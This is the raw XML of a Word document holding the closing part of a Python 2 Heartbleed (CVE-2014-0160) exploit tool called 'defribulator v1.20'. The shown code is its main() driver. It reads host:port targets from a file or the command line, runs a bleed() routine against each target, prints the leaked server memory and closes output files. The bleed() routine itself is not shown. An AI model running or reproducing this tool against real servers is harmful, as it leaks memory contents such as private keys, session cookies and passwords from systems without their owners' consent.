    <w:p w14:paraId="74095756" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="25687CB9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34859010" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="02F47AE7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="781B8F29" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="54500E48" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E40D0C7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="379615FF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="13D697DA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2A8C5339" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    print "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ndefribulator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v1.20"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6461810E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0BA0DDA4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    print "A tool to test and exploit the TLS heartbeat vulnerability aka </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>heartbleed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (CVE-2014-0160)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563911B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="47C278F2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allresults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6C857" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3B605EB7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1E534A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="556E42A8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    # if a file is specified, loop through file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FFFBC7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="546AC57A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.filein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F26BE67" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2C63412C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.filein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, "r")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C800F5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="71D9BE3F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496471D8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2D704828" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        for line in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478CF475" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="058B02C0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>line.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>().split(":")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F535D9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1A1FA538" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B121196" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0F3982D5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allresults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = bleed(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[0], int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[1]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5CE8F7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="03621F6E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665C6E50" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0300EB7A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allresults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = bleed(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">[0], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555656D3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6C4DBCA3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A9DD7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="32963F36" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allresults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and (not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.donotdisplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903C911" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="314571D6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print '%s' % (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allresults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502CDE5B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="645B2B10" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="188FF522" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="65BBD78A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileIN.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248C031" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6C0209B0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="253AA8BD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5668219E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE84C2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3A9808ED" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &lt; 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B4F13" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="62358A14" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.print_help</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF1CF9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="68075206" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE29AA6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3F53D6C7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allresults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = bleed(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">[0], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E636F88" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="17BA62B7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allresults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and (not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.donotdisplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6469C3B2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="48856CDD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            print '%s' % (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allresults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE3506" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5334FFBE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334410B0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="554102A8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0FD540" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0C74D983" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C92139" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="340C6F1C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.rawoutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F521F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="52CE5E01" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rawfileOUT.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F93809" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="60E78BC8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA61AE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="13B22AE1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.asciioutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3523A4F9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="337CB6E1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asciifileOUT.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5280A815" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2CBD1F5F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E694F02" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5908F537" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B411A0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="69ADAF53" w14:textId="62150E60" w:rsidR="000E7537" w:rsidRPr="009F02D9" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000E7537" w:rsidRPr="009F02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46B6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E76CC7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E2ED1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="872C43AE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91"/>
    <w:rsid w:val="000E7537"/>
    <w:rsid w:val="001A6E05"/>
    <w:rsid w:val="00224B94"/>
    <w:rsid w:val="002B5F14"/>
    <w:rsid w:val="00330C91"/>
    <w:rsid w:val="00383904"/>
    <w:rsid w:val="003E31D1"/>
    <w:rsid w:val="00470BB3"/>
    <w:rsid w:val="004849F8"/>
    <w:rsid w:val="004A2CF9"/>
    <w:rsid w:val="004C0919"/>
    <w:rsid w:val="00633765"/>
    <w:rsid w:val="008179F3"/>
    <w:rsid w:val="00824658"/>
    <w:rsid w:val="008F6B2E"/>
    <w:rsid w:val="009B7444"/>
    <w:rsid w:val="009F02D9"/>
    <w:rsid w:val="00A06BD3"/>
    <w:rsid w:val="00AF204A"/>
    <w:rsid w:val="00BC0BAD"/>
    <w:rsid w:val="00BD0DFD"/>
    <w:rsid w:val="00D2067A"/>
    <w:rsid w:val="00E53635"/>
    <w:rsid w:val="00ED5BA0"/>
    <w:rsid w:val="00F46F81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B9C78"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2C86C2B3-8DD4-4C71-82D4-73D61AEB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90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0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F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9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F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04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5363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363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tbleedlabelgg.co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heartbleedlabelgg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09E3-8A74-4BD9-A922-5D8F77D8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mar Tariq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Muhammad Umar Tariq</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <cp:lastPrinted>2020-08-16T04:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-16T03:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-16T04:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>